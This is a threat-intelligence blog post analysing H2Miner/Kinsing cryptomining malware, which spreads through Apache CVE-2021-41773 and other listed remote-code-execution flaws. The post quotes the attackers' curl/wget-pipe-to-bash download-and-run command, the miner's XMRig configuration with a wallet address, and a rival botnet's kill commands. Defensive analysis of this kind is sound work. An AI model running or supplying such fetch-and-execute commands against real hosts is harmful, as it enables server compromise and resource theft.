Cloud computing has its share of major security threats, and there are some that are both consistent and insistent. One of them is the H2Miner/Kinsing malware. The people behind it use high severity, public vulnerabilities to continue installing their RAT and miner, such as the recent Apache Path Traversal CVE-2021-41773, the last vulnerability added to their already expansive portfolio.

In this case, they are looking for servers with mod_cgi enabled in order to directly infect the server by running a simple curl -s URL||wget -q -O- URL) | bash command, which, if successful, will compromise the host and will even return the script output in the HTTP response.

These attackers are also known for actively scanning for exposed and exploitable Docker Remote APIs and Redis servers, as well as for exploiting several vulnerabilities:

  • CVE-2017-11610 Supervisor 3.0a1 – 3.3.2 RCE
  • CVE-2017-15718 Hadoop Yarn REST API Unauthorized RCE
  • CVE-2017-9841 Arbitrary PHP execution
  • CVE-2018-20062 ThinkPHP 5.X RCE
  • CVE-2019-0193 Solr dataimport RCE
  • CVE-2019-19781 Citrix Application Delivery Controller and Citrix Gateway RCE
  • CVE-2019-3396 Confluence Unauthorized RCE
  • CVE-2020-11651(2) SaltSTack 3000.1 RCE
  • CVE-2020-25213 WordPress File Manager RCE
  • CVE-2021-26084 Confluence Server Webwork OGNL injection

It seems that there are no big updates in the binaries, as the Golang malware sample used today was first seen in December 2020. This sample is using the latest 0.17.1 version of pkger, which was released in August 2020, giving us a time range where this malware version ended its development.

The miner used is the infamous XMRig on its 5.5.0 version, with a configuration file long in use:

  "background": true,
  "donate-level": 0,
  "cpu": true,
  "colors": false,
  "opencl": false,
  "pools": [
      "coin": "monero",
      "algo": null,
      "url": "",
      "user": "46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb",
      "pass": "mine",
      "tls": false,
      "keepalive": true,
      "nicehash": false

The downloaded script hasn’t changed much since previous versions used with other exploits, so we won’t go into detail as the references provide great analysis.

The world of automated exploitation of public facing vulnerable hosts has become a wild area, and there is a fight for “computing resources”. Just few minutes after this automatic attack took over the host, another automatic exploitation occurred, and the first thing they did was to remove already planted malware:

pgrep kinsing | xargs -I % kill -9
pkill kinsing
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9

This was of course the precursor to installing their own cryptominer.

Then, a few minutes after the Kinsing malware was killed, we saw that Kinsing was installed again. However, there was no persistence mechanism in place, because the malware failed to add it during the infection phase. The host was being exploited again, and it wasn’t a coincidence—there was some kind of “online persistence mechanism”. If the RAT didn’t call home for some time, the vulnerability was exploited again in order to keep access to the host.

As it can be seen, the most relevant Remote Code Execution vulnerabilities are quickly weaponized not only for targeted attacks, but also to continue expanding active botnets, and there is a fight for “available” resources in the linux server ecosystem. The lesson? Beware of cloud wars.



Name/PathHash sha2556URL

Mikel Gastesi, Threat Analyst at CounterCraft, combines his expertise in threat detection and analysis with the power of the Deception technology to get an explosive combination with the best of both worlds. You can find him on LinkedIn.